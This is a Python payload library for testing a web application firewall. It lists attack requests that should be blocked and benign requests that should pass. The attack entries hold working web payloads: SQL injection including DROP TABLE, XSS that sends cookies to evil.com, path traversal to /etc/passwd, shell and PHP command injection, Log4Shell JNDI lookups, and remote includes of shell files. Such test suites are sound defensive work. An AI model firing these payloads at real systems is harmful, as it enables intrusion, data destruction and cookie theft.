# payloads.py — WAF test payload library
# Each payload has an expected outcome: "block" or "pass"

ATTACK_PAYLOADS = [
    # ── SQL Injection ─────────────────────────────────────────────────────────
    {"id": "sqli-001", "category": "SQL Injection",    "name": "OR 1=1 tautology",
     "method": "GET",  "path": "/", "params": {"id": "1' OR '1'='1"},
     "headers": {},    "body": None, "expected": "block"},
    {"id": "sqli-002", "category": "SQL Injection",    "name": "UNION SELECT",
     "method": "GET",  "path": "/", "params": {"id": "1 UNION SELECT 1,2,3--"},
     "headers": {},    "body": None, "expected": "block"},
    {"id": "sqli-003", "category": "SQL Injection",    "name": "DROP TABLE",
     "method": "GET",  "path": "/", "params": {"q": "'; DROP TABLE users--"},
     "headers": {},    "body": None, "expected": "block"},
    {"id": "sqli-004", "category": "SQL Injection",    "name": "Blind boolean",
     "method": "GET",  "path": "/", "params": {"id": "1 AND 1=2"},
     "headers": {},    "body": None, "expected": "block"},
    {"id": "sqli-005", "category": "SQL Injection",    "name": "Time-based blind",
     "method": "GET",  "path": "/", "params": {"id": "1; WAITFOR DELAY '0:0:5'--"},
     "headers": {},    "body": None, "expected": "block"},
    {"id": "sqli-006", "category": "SQL Injection",    "name": "POST body injection",
     "method": "POST", "path": "/", "params": {},
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "username=admin'--&password=x", "expected": "block"},

    # ── Cross-Site Scripting ──────────────────────────────────────────────────
    {"id": "xss-001", "category": "XSS", "name": "Script tag",
     "method": "GET", "path": "/", "params": {"q": "<script>alert(1)</script>"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "xss-002", "category": "XSS", "name": "IMG onerror",
     "method": "GET", "path": "/", "params": {"q": "<img src=x onerror=alert(1)>"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "xss-003", "category": "XSS", "name": "SVG onload",
     "method": "GET", "path": "/", "params": {"q": "<svg onload=alert(1)>"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "xss-004", "category": "XSS", "name": "JavaScript URI",
     "method": "GET", "path": "/", "params": {"url": "javascript:alert(1)"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "xss-005", "category": "XSS", "name": "Event handler in body",
     "method": "POST", "path": "/", "params": {},
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "comment=<script>fetch('https://evil.com?c='+document.cookie)</script>",
     "expected": "block"},

    # ── Local File Inclusion ──────────────────────────────────────────────────
    {"id": "lfi-001", "category": "LFI", "name": "Path traversal /etc/passwd",
     "method": "GET", "path": "/", "params": {"file": "../../../etc/passwd"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "lfi-002", "category": "LFI", "name": "Windows traversal",
     "method": "GET", "path": "/", "params": {"file": "..\\..\\..\\windows\\win.ini"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "lfi-003", "category": "LFI", "name": "Encoded traversal",
     "method": "GET", "path": "/%2e%2e/%2e%2e/etc/passwd", "params": {},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "lfi-004", "category": "LFI", "name": "Proc self environ",
     "method": "GET", "path": "/", "params": {"page": "/proc/self/environ"},
     "headers": {}, "body": None, "expected": "block"},

    # ── Remote Code Execution ─────────────────────────────────────────────────
    {"id": "rce-001", "category": "RCE", "name": "Shell command injection",
     "method": "GET", "path": "/", "params": {"cmd": "; cat /etc/passwd"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "rce-002", "category": "RCE", "name": "Backtick execution",
     "method": "GET", "path": "/", "params": {"input": "`id`"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "rce-003", "category": "RCE", "name": "Pipe to shell",
     "method": "GET", "path": "/", "params": {"q": "| whoami"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "rce-004", "category": "RCE", "name": "Semicolon chain",
     "method": "GET", "path": "/", "params": {"q": "; ls -la /"},
     "headers": {}, "body": None, "expected": "block"},

    # ── Scanner Detection ─────────────────────────────────────────────────────
    {"id": "scan-001", "category": "Scanner", "name": "sqlmap user-agent",
     "method": "GET", "path": "/", "params": {},
     "headers": {"User-Agent": "sqlmap/1.6.12#stable"}, "body": None, "expected": "block"},
    {"id": "scan-002", "category": "Scanner", "name": "Nikto scanner",
     "method": "GET", "path": "/", "params": {},
     "headers": {"User-Agent": "Nikto/2.1.6"}, "body": None, "expected": "block"},
    {"id": "scan-003", "category": "Scanner", "name": "Nmap scripting engine",
     "method": "GET", "path": "/", "params": {},
     "headers": {"User-Agent": "Nmap Scripting Engine"}, "body": None, "expected": "block"},
    {"id": "scan-004", "category": "Scanner", "name": "Nuclei scanner",
     "method": "GET", "path": "/", "params": {},
     "headers": {"User-Agent": "nuclei/2.9.4"}, "body": None, "expected": "block"},

    # ── PHP Injection ─────────────────────────────────────────────────────────
    {"id": "php-001", "category": "PHP Injection", "name": "PHP eval",
     "method": "GET", "path": "/", "params": {"input": "<?php eval($_GET['cmd']); ?>"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "php-002", "category": "PHP Injection", "name": "PHP system call",
     "method": "GET", "path": "/", "params": {"q": "<?php system('id'); ?>"},
     "headers": {}, "body": None, "expected": "block"},

    # ── Log4Shell ─────────────────────────────────────────────────────────────
    {"id": "java-001", "category": "Log4Shell", "name": "Log4Shell JNDI lookup",
     "method": "GET", "path": "/", "params": {},
     "headers": {"X-Api-Version": "${jndi:ldap://evil.com/exploit}"},
     "body": None, "expected": "block"},
    {"id": "java-002", "category": "Log4Shell", "name": "Log4Shell in User-Agent",
     "method": "GET", "path": "/", "params": {},
     "headers": {"User-Agent": "${jndi:ldap://192.168.1.1:1389/a}"},
     "body": None, "expected": "block"},

    # ── Remote File Inclusion ─────────────────────────────────────────────────
    {"id": "rfi-001", "category": "RFI", "name": "HTTP remote include",
     "method": "GET", "path": "/", "params": {"page": "http://evil.com/shell.php"},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "rfi-002", "category": "RFI", "name": "FTP remote include",
     "method": "GET", "path": "/", "params": {"file": "ftp://evil.com/backdoor.php"},
     "headers": {}, "body": None, "expected": "block"},

    # ── Protocol Attacks ──────────────────────────────────────────────────────
    {"id": "proto-001", "category": "Protocol Attack", "name": "Null byte injection",
     "method": "GET", "path": "/index.php%00.jpg", "params": {},
     "headers": {}, "body": None, "expected": "block"},
    {"id": "proto-002", "category": "Protocol Attack", "name": "HTTP splitting CRLF",
     "method": "GET", "path": "/", "params": {"q": "foo%0d%0aSet-Cookie: evil=1"},
     "headers": {}, "body": None, "expected": "block"},
]

BENIGN_PAYLOADS = [
    {"id": "ok-001", "category": "Normal Traffic", "name": "Homepage GET",
     "method": "GET", "path": "/", "params": {},
     "headers": {}, "body": None, "expected": "pass"},
    {"id": "ok-002", "category": "Normal Traffic", "name": "Search query",
     "method": "GET", "path": "/", "params": {"q": "nginx proxy manager"},
     "headers": {}, "body": None, "expected": "pass"},
    {"id": "ok-003", "category": "Normal Traffic", "name": "Numeric param",
     "method": "GET", "path": "/", "params": {"id": "42"},
     "headers": {}, "body": None, "expected": "pass"},
    {"id": "ok-004", "category": "Normal Traffic", "name": "Chrome user-agent",
     "method": "GET", "path": "/", "params": {},
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36"},
     "body": None, "expected": "pass"},
    {"id": "ok-005", "category": "Normal Traffic", "name": "JSON POST",
     "method": "POST", "path": "/", "params": {},
     "headers": {"Content-Type": "application/json"},
     "body": '{"username": "admin", "password": "hunter2"}', "expected": "pass"},
    {"id": "ok-006", "category": "Normal Traffic", "name": "Form POST",
     "method": "POST", "path": "/", "params": {},
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "email=user%40example.com&name=John+Doe", "expected": "pass"},
    {"id": "ok-007", "category": "Normal Traffic", "name": "Path with extension",
     "method": "GET", "path": "/assets/logo.png", "params": {},
     "headers": {}, "body": None, "expected": "pass"},
    {"id": "ok-008", "category": "Normal Traffic", "name": "Hyphenated path",
     "method": "GET", "path": "/api/v1/health-check", "params": {},
     "headers": {}, "body": None, "expected": "pass"},
    {"id": "ok-009", "category": "Normal Traffic", "name": "Accept-Language header",
     "method": "GET", "path": "/", "params": {},
     "headers": {"Accept-Language": "en-US,en;q=0.9"},
     "body": None, "expected": "pass"},
    {"id": "ok-010", "category": "Normal Traffic", "name": "Special chars in legit context",
     "method": "GET", "path": "/", "params": {"name": "O'Brien"},
     "headers": {}, "body": None, "expected": "pass"},
]

ALL_PAYLOADS = ATTACK_PAYLOADS + BENIGN_PAYLOADS

SUITES = {
    "attack":  ATTACK_PAYLOADS,
    "benign":  BENIGN_PAYLOADS,
    "full":    ALL_PAYLOADS,
    "sqli":    [p for p in ATTACK_PAYLOADS if p["category"] == "SQL Injection"],
    "xss":     [p for p in ATTACK_PAYLOADS if p["category"] == "XSS"],
    "lfi":     [p for p in ATTACK_PAYLOADS if p["category"] == "LFI"],
    "rce":     [p for p in ATTACK_PAYLOADS if p["category"] == "RCE"],
    "scanner": [p for p in ATTACK_PAYLOADS if p["category"] == "Scanner"],
}
